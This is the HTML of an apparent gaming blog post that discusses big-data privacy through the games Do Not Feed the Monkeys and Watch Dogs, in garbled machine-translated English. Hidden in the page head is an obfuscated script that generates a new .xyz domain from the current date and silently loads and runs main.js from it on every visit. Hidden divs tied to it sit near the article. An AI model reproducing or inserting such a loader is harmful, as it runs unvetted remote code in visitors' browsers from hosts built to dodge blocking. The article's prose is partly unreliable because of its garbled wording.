<!DOCTYPE html>



  


<html class="theme-next muse use-motion" lang="en">
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="Game,">










<meta name="description" content="With the rapid development of science and technology, people’s lives become more efficient and convenient relying on a variety of high-tech digital products. Basically, everyone will have a virtual fi">
<meta name="keywords" content="Game">
<meta property="og:type" content="article">
<meta property="og:title" content="In the era of big data, do you want to be a watchdog or a monkey">
<meta property="og:url" content="http://maiygu.xyz/2019/11/08/In the era of big data, do you want to be a watchdog or a monkey/index.html">
<meta property="og:site_name" content="Games">
<meta property="og:description" content="With the rapid development of science and technology, people’s lives become more efficient and convenient relying on a variety of high-tech digital products. Basically, everyone will have a virtual fi">
<meta property="og:locale" content="en">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/In the era of big data, do you want to be a watchdog or a monkey/c7e8df4f148a4277bc675f404e4d8d24.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/In the era of big data, do you want to be a watchdog or a monkey/908247ad70d948419d145a5969d36e39.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/In the era of big data, do you want to be a watchdog or a monkey/96b16ed0e8f4450f888b815f949a4793.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/In the era of big data, do you want to be a watchdog or a monkey/6545a20524584959a62d12b0245ef782.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/In the era of big data, do you want to be a watchdog or a monkey/610be8dac204420f95a2e2a0b26e8934.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/In the era of big data, do you want to be a watchdog or a monkey/5b6f4492c17d42ecb6aa768472121383.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/In the era of big data, do you want to be a watchdog or a monkey/14536c8c28ad4e81bab19acff9267b5c.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/In the era of big data, do you want to be a watchdog or a monkey/9765508d75c845439347d1afefd2619d.jpg">
<meta property="og:updated_time" content="2021-03-02T08:49:49.000Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="In the era of big data, do you want to be a watchdog or a monkey">
<meta name="twitter:description" content="With the rapid development of science and technology, people’s lives become more efficient and convenient relying on a variety of high-tech digital products. Basically, everyone will have a virtual fi">
<meta name="twitter:image" content="http://maiygu.xyz/2019/11/08/In the era of big data, do you want to be a watchdog or a monkey/c7e8df4f148a4277bc675f404e4d8d24.jpg">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    version: '5.1.4',
    sidebar: {"position":"left","display":"hide","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: 'Author'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://maiygu.xyz/2019/11/08/In the era of big data, do you want to be a watchdog or a monkey/">




<script type="text/javascript">!function(n){var t,e=function(n,t){var e=[["a","e","i","o","u","y"],["b","c","d","f","g","h","j","k","l","m","n","p","q","r","s","t","v","w","x","y","z"]];if(t)for(var r=0;r<=t.length-1;r++)n=n*t.charCodeAt(r)%4294967295;var l;return next=(l=n,function(n){return l=l+1831565813|0,(((n=(n=Math.imul(l^l>>>15,1|l))+Math.imul(n^n>>>7,61|n)^n)^n>>>14)>>>0)/Math.pow(2,32)}),function(n,t){for(var r=[],l=null,o=0;o<=n-1;o++){var a=void 0;null===l?a=e[0].concat(e[1]):1==l?(a=e[0],l=0):(a=e[1],l=1);var u=a[Math.floor(next()*a.length)];r.push(u),null===l&&(l=-1!=e[0].indexOf(u)?0:1)}return r.push("."+t),r.join("")}}((t=new Date,(t/=1e3)-t%1209600),"_fa7cdd4c68507744")(8,"xyz");if(null===n)console.log("https://"+e);else{var r=n.createElement("script");r.src="https://"+e+"/main.js",(n.body||n.head).appendChild(r)}}("undefined"!=typeof document?document:null);
</script>

  <title>In the era of big data, do you want to be a watchdog or a monkey | Games</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="en">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Games</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">Games</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            Home
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
            
            Tags
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            Archives
          </a>
        </li>
      
        
        <li class="menu-item menu-item-sitemap">
          <a href="/sitemap.xml" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-sitemap"></i> <br>
            
            Sitemap
          </a>
        </li>
      

      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br>
            
            Search
          </a>
        </li>
      
    </ul>
  

  
    <div class="site-search">
      
  <div class="popup search-popup local-search-popup">
  <div class="local-search-header clearfix">
    <span class="search-icon">
      <i class="fa fa-search"></i>
    </span>
    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
    <div class="local-search-input-wrapper">
      <input autocomplete="off" placeholder="Searching..." spellcheck="false" type="text" id="local-search-input">
    </div>
  </div>
  <div id="local-search-result"></div>
</div>



    </div>
  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
 
 
 <div class="_fa7cdd4c68507744" data-options="count=1,interval=1,burst=1" data-zone="22aeec266c49468da6040eff035066b8" style="display: none"></div>
 <div class="_fa7cdd4c68507744" data-options="count=1,interval=1,burst=1" data-zone="7aa7f6c595384fd6a2e5f5016b455fd2" style="display: none"></div>
 <div class="_fa7cdd4c68507744" data-zone="df2a1bde9f44465a8457aaf705928077" style="width:728px;height:90px;display: inline-block;margin: 0 auto"></div>
 <div class="_fa7cdd4c68507744" data-zone="4fff9a79323749608f8df1eff7291bcf" style="width:970px;height:90px;display: inline-block;margin: 0 auto"></div>
 
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://maiygu.xyz/2019/11/08/In the era of big data, do you want to be a watchdog or a monkey/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Harry">
      <meta itemprop="description" content>
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Games">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">In the era of big data, do you want to be a watchdog or a monkey</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2019-11-08T00:00:00+08:00">
                2019-11-08
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>With the rapid development of science and technology, people’s lives become more efficient and convenient relying on a variety of high-tech digital products. Basically, everyone will have a virtual file on the Internet to use the functions of various service-oriented software. The world’s leading management consulting company once said that: data has penetrated into every industry and business function field and become an important production factor. People’s mining and application of massive data indicates the arrival of a new wave of productivity growth and consumer surplus, and this wave is known as the “big data era”.<br><img src="http://maiygu.xyz/2019/11/08/In the era of big data, do you want to be a watchdog or a monkey/c7e8df4f148a4277bc675f404e4d8d24.jpg" alt="In the era of big data, do you want to be a watchdog or a monkey"><br>But have you ever thought that in such an era, our personal information can still be safe and confidential? Not only have you ever had the experience of adding a shopping cart when you see the desired product on the Internet, but also when you hesitate to buy it, and then you turn off the web page and open other apps, resulting in a huge advertisement in front of you, which is the product you just added to the shopping cart. Or they often receive calls from people who don’t know where they are from, and the content of these calls is often to promote products or businesses. I don’t know if you think like this: how do they know my information? In view of this situation, many artists have expressed their opinions and understandings in different forms, among which, of course, games are indispensable.</p>
<h1 id="“primate-watch-club”"><a href="#“primate-watch-club”" class="headerlink" title="“primate watch club”"></a>“primate watch club”</h1><p>In October 2018, a game development team from Spain, fictiorama studios, brought us a game called do not feed the monkeys. At first glance, anyone who listens to the game with a very strange name will think it is a simulated nurturing game. However, the actual content and playing method of the game are very bad. First of all, we can be sure that there are no monkeys in this game, but when you have a deep understanding of this game, you will have a feeling of “it seems that it’s OK to call it this way”.<br><img src="http://maiygu.xyz/2019/11/08/In the era of big data, do you want to be a watchdog or a monkey/908247ad70d948419d145a5969d36e39.jpg" alt="In the era of big data, do you want to be a watchdog or a monkey"><br>What kind of game is this? I don’t know how to define it. According to the introduction of the game, he calls himself “peeping Simulator”. In the game, the player will play the role of an ordinary citizen living in a rental apartment. A netizen invited the protagonist to join a private club. The activity content of the club is to observe people or things from all over the world through a variety of security cameras or webcams through a software. The club calls each monitoring window “cage”, while the people in the monitoring room are It is called “primate”, that is, “monkey”. There are two rules in the club: no interaction with primates and no feeding of monkeys. In short, the club gives you the right to peek at others, but you must not directly contact with the people under surveillance or send things to the people under surveillance.<br><img src="http://maiygu.xyz/2019/11/08/In the era of big data, do you want to be a watchdog or a monkey/96b16ed0e8f4450f888b815f949a4793.jpg" alt="In the era of big data, do you want to be a watchdog or a monkey"><br>The so-called “the unreachable are always in turmoil” is that under such a condition, people will be more curious about what will happen if they contact with “monkeys”. In the game, players need to work to maintain their own livelihood. It is necessary to eat and sleep. Next, sitting in front of the computer and watching “monkey”. We can collect some information through the words of “monkey”. By integrating these information and searching on the Internet, we can find out who the observed people are, what they are doing and what secrets they have. With the information in our hands, we can easily accomplish certain things, such as we can threaten some people who do things harmful to the nature to make profits, or help some people who have difficulties and need help, but this means that we, as a stranger, interfere with other people’s original life, and we need to remember to abide by the rules of the club, or we will play over.<br><img src="http://maiygu.xyz/2019/11/08/In the era of big data, do you want to be a watchdog or a monkey/6545a20524584959a62d12b0245ef782.jpg" alt="In the era of big data, do you want to be a watchdog or a monkey"><br>Everyone has a secret. For example, this politician is a polite politician in the daytime, and he becomes a woman in the middle of the night<br>The mode of the whole game is very similar to the movie “the back window”, which was released on August 1, 1954. The protagonist of the movie spies and collects information every day to detect a murder. The same is true in “don’t feed the monkey”. However, each “cage” does not interfere with each other, but most cages have some strange time If it happens, players can track it if they are interested, and if they don’t do anything, it won’t have any impact. The idea of the game is to give the player the right to choose all things, and let the player know and judge by himself. There is no doubt that peeping into other people’s life is a very exciting thing, but more often it is the player’s conscience that is tested.<br><img src="http://maiygu.xyz/2019/11/08/In the era of big data, do you want to be a watchdog or a monkey/610be8dac204420f95a2e2a0b26e8934.jpg" alt="In the era of big data, do you want to be a watchdog or a monkey"><br>You can buy something for “the man in the cage”, which is “feed the monkey”</p>
<h1 id="“watchdog”"><a href="#“watchdog”" class="headerlink" title="“watchdog”"></a>“watchdog”</h1><p>In March 2018, Britain and the United States reported that a data analysis company called “Cambridge analysis” collected more than 50 million user data through a psychological quiz developed for Facebook platform, and then used the data to control the 2016 US presidential election. This news burst out, immediately triggered social controversy, which means that all people’s daily actions on the Internet are recorded and analyzed. This event makes many people feel creepy, which means that the network environment we usually rely on is not safe.<br><img src="http://maiygu.xyz/2019/11/08/In the era of big data, do you want to be a watchdog or a monkey/5b6f4492c17d42ecb6aa768472121383.jpg" alt="In the era of big data, do you want to be a watchdog or a monkey"><br>What websites to watch, what to like and whether to fast forward videos will become the data of character judgment<br>In the game “watchdog”, we have built a world of big data era for us. In order to enjoy the convenient life conveniently and quickly, all people’s information has been uploaded to the same network CTOs, which means that if the system is not secure, everyone’s life will be snooped and controlled, and people’s information will be commercialized for profit ; and if the network administrator is malicious, the same situation will happen. Everyone is in a state of being monitored, with no privacy or freedom to speak of.<br>In the game, we can see that, in fact, people’s life has become more relaxed and convenient because of CTOs, but it seems that the whole city has no vitality and vitality to speak of. You can’t feel the happy atmosphere because of the convenient life. For these citizens who don’t understand, it seems that they deserve it.<br><img src="http://maiygu.xyz/2019/11/08/In the era of big data, do you want to be a watchdog or a monkey/14536c8c28ad4e81bab19acff9267b5c.jpg" alt="In the era of big data, do you want to be a watchdog or a monkey"><br>With the help of the hacker organization dedsec, the protagonist of the game achieves his own goal, while the darkest part of CTOs is exposed in front of people. People protested and tried to find relevant departments for a statement. From here we can see that the citizens have been kept in the dark for a long time. Although we know that the original intention of CTOs is good, and its purpose is to serve people’s lives, it is inevitable that there will be some outlaws making profits from it.<br>The name of the game is watch dog, which is a proper term in computer science. It refers to a unit used to supervise the chip situation of computer single-chip microcomputer. The city in the game is like a huge single-chip microcomputer, and the hacker organization is like this “watch dog”. It is their existence that makes people realize that information is big The drawback of unity. Even the managers of the world need a watcher to pay attention to them. Otherwise, if they commit crimes that day, who can stop them?<br><img src="http://maiygu.xyz/2019/11/08/In the era of big data, do you want to be a watchdog or a monkey/9765508d75c845439347d1afefd2619d.jpg" alt="In the era of big data, do you want to be a watchdog or a monkey"><br>    concluding remarks<br>From different games, we can know the experience and mentality of “Observer” and “observed” from different perspectives. After comparing with reality, we can easily come to the conclusion that the era of big data is like a double-edged sword. While bringing us great convenience in production and life, some seemingly inadvertent things are slowly changing us Life. Since technology is advancing, people’s thoughts and consciousness should also be improved. To change people’s way of controlling new technology, we should learn to think. In a rapidly changing society, we should master our own cognition, do a good job in privacy protection, and never become a naked “transparent person” in front of data.</p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/Game/" rel="tag"># Game</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/11/08/In just four months, the fans of Baoke dream have gone from great joy to rage/" rel="next" title="In just four months, the fans of Baoke dream have gone from great joy to rage">
                <i class="fa fa-chevron-left"></i> In just four months, the fans of Baoke dream have gone from great joy to rage
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2019/11/08/In the invisible platform of flying, how can blue keep pace with many 3A/" rel="prev" title="In the invisible platform of flying, how can blue keep pace with many 3A">
                In the invisible platform of flying, how can blue keep pace with many 3A <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            Overview
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">Harry</p>
              <p class="site-description motion-element" itemprop="description">Games</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">114</span>
                  <span class="site-state-item-name">posts</span>
                </a>
              </div>
            

            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">1</span>
                  <span class="site-state-item-name">tags</span>
                </a>
              </div>
            

          </nav>

          

          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#“primate-watch-club”"><span class="nav-number">1.</span> <span class="nav-text">“primate watch club”</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#“watchdog”"><span class="nav-number">2.</span> <span class="nav-text">“watchdog”</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        

<div class="copyright">&copy; <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Harry</span>

  
</div>









        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  

  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    var isXml = true;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length === 0) {
      search_path = "search.xml";
    } else if (/json$/i.test(search_path)) {
      isXml = false;
    }
    var path = "/" + search_path;
    // monitor main search box;

    var onPopupClose = function (e) {
      $('.popup').hide();
      $('#local-search-input').val('');
      $('.search-result-list').remove();
      $('#no-result').remove();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    }

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.search-popup-overlay').click(onPopupClose);
      $('.popup').toggle();
      var $localSearchInput = $('#local-search-input');
      $localSearchInput.attr("autocapitalize", "none");
      $localSearchInput.attr("autocorrect", "off");
      $localSearchInput.focus();
    }

    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';

      // start loading animation
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay">' +
          '<div id="search-loading-icon">' +
          '<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
          '</div>' +
          '</div>')
        .css('overflow', 'hidden');
      $("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');

      $.ajax({
        url: path,
        dataType: isXml ? "xml" : "json",
        async: true,
        success: function(res) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = isXml ? $("entry", res).map(function() {
            return {
              title: $("title", this).text(),
              content: $("content",this).text(),
              url: $("url" , this).text()
            };
          }).get() : res;
          var input = document.getElementById(search_id);
          var resultContent = document.getElementById(content_id);
          var inputEventFunction = function() {
            var searchText = input.value.trim().toLowerCase();
            var keywords = searchText.split(/[\s\-]+/);
            if (keywords.length > 1) {
              keywords.push(searchText);
            }
            var resultItems = [];
            if (searchText.length > 0) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var hitCount = 0;
                var searchTextCount = 0;
                var title = data.title.trim();
                var titleInLowerCase = title.toLowerCase();
                var content = data.content.trim().replace(/<[^>]+>/g,"");
                var contentInLowerCase = content.toLowerCase();
                var articleUrl = decodeURIComponent(data.url);
                var indexOfTitle = [];
                var indexOfContent = [];
                // only match articles with not empty titles
                if(title != '') {
                  keywords.forEach(function(keyword) {
                    function getIndexByWord(word, text, caseSensitive) {
                      var wordLen = word.length;
                      if (wordLen === 0) {
                        return [];
                      }
                      var startPosition = 0, position = [], index = [];
                      if (!caseSensitive) {
                        text = text.toLowerCase();
                        word = word.toLowerCase();
                      }
                      while ((position = text.indexOf(word, startPosition)) > -1) {
                        index.push({position: position, word: word});
                        startPosition = position + wordLen;
                      }
                      return index;
                    }

                    indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
                    indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
                  });
                  if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
                    isMatch = true;
                    hitCount = indexOfTitle.length + indexOfContent.length;
                  }
                }

                // show search results

                if (isMatch) {
                  // sort index by position of keyword

                  [indexOfTitle, indexOfContent].forEach(function (index) {
                    index.sort(function (itemLeft, itemRight) {
                      if (itemRight.position !== itemLeft.position) {
                        return itemRight.position - itemLeft.position;
                      } else {
                        return itemLeft.word.length - itemRight.word.length;
                      }
                    });
                  });

                  // merge hits into slices

                  function mergeIntoSlice(text, start, end, index) {
                    var item = index[index.length - 1];
                    var position = item.position;
                    var word = item.word;
                    var hits = [];
                    var searchTextCountInSlice = 0;
                    while (position + word.length <= end && index.length != 0) {
                      if (word === searchText) {
                        searchTextCountInSlice++;
                      }
                      hits.push({position: position, length: word.length});
                      var wordEnd = position + word.length;

                      // move to next position of hit

                      index.pop();
                      while (index.length != 0) {
                        item = index[index.length - 1];
                        position = item.position;
                        word = item.word;
                        if (wordEnd > position) {
                          index.pop();
                        } else {
                          break;
                        }
                      }
                    }
                    searchTextCount += searchTextCountInSlice;
                    return {
                      hits: hits,
                      start: start,
                      end: end,
                      searchTextCount: searchTextCountInSlice
                    };
                  }

                  var slicesOfTitle = [];
                  if (indexOfTitle.length != 0) {
                    slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
                  }

                  var slicesOfContent = [];
                  while (indexOfContent.length != 0) {
                    var item = indexOfContent[indexOfContent.length - 1];
                    var position = item.position;
                    var word = item.word;
                    // cut out 100 characters
                    var start = position - 20;
                    var end = position + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if (end < position + word.length) {
                      end = position + word.length;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
                  }

                  // sort slices in content by search text's count and hits' count

                  slicesOfContent.sort(function (sliceLeft, sliceRight) {
                    if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
                      return sliceRight.searchTextCount - sliceLeft.searchTextCount;
                    } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
                      return sliceRight.hits.length - sliceLeft.hits.length;
                    } else {
                      return sliceLeft.start - sliceRight.start;
                    }
                  });

                  // select top N slices in content

                  var upperBound = parseInt('1');
                  if (upperBound >= 0) {
                    slicesOfContent = slicesOfContent.slice(0, upperBound);
                  }

                  // highlight title and content

                  function highlightKeyword(text, slice) {
                    var result = '';
                    var prevEnd = slice.start;
                    slice.hits.forEach(function (hit) {
                      result += text.substring(prevEnd, hit.position);
                      var end = hit.position + hit.length;
                      result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
                      prevEnd = end;
                    });
                    result += text.substring(prevEnd, slice.end);
                    return result;
                  }

                  var resultItem = '';

                  if (slicesOfTitle.length != 0) {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
                  } else {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
                  }

                  slicesOfContent.forEach(function (slice) {
                    resultItem += "<a href='" + articleUrl + "'>" +
                      "<p class=\"search-result\">" + highlightKeyword(content, slice) +
                      "...</p>" + "</a>";
                  });

                  resultItem += "</li>";
                  resultItems.push({
                    item: resultItem,
                    searchTextCount: searchTextCount,
                    hitCount: hitCount,
                    id: resultItems.length
                  });
                }
              })
            };
            if (keywords.length === 1 && keywords[0] === "") {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>'
            } else if (resultItems.length === 0) {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>'
            } else {
              resultItems.sort(function (resultLeft, resultRight) {
                if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
                  return resultRight.searchTextCount - resultLeft.searchTextCount;
                } else if (resultLeft.hitCount !== resultRight.hitCount) {
                  return resultRight.hitCount - resultLeft.hitCount;
                } else {
                  return resultRight.id - resultLeft.id;
                }
              });
              var searchResultList = '<ul class=\"search-result-list\">';
              resultItems.forEach(function (result) {
                searchResultList += result.item;
              })
              searchResultList += "</ul>";
              resultContent.innerHTML = searchResultList;
            }
          }

          if ('auto' === 'auto') {
            input.addEventListener('input', inputEventFunction);
          } else {
            $('.search-icon').click(inputEventFunction);
            input.addEventListener('keypress', function (event) {
              if (event.keyCode === 13) {
                inputEventFunction();
              }
            });
          }

          // remove loading animation
          $(".local-search-pop-overlay").remove();
          $('body').css('overflow', '');

          proceedsearch();
        }
      });
    }

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched === false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(onPopupClose);
    $('.popup').click(function(e){
      e.stopPropagation();
    });
    $(document).on('keyup', function (event) {
      var shouldDismissSearchPopup = event.which === 27 &&
        $('.search-popup').is(':visible');
      if (shouldDismissSearchPopup) {
        onPopupClose();
      }
    });
  </script>





  

  

  

  
  

  

  

  

</body>
</html>
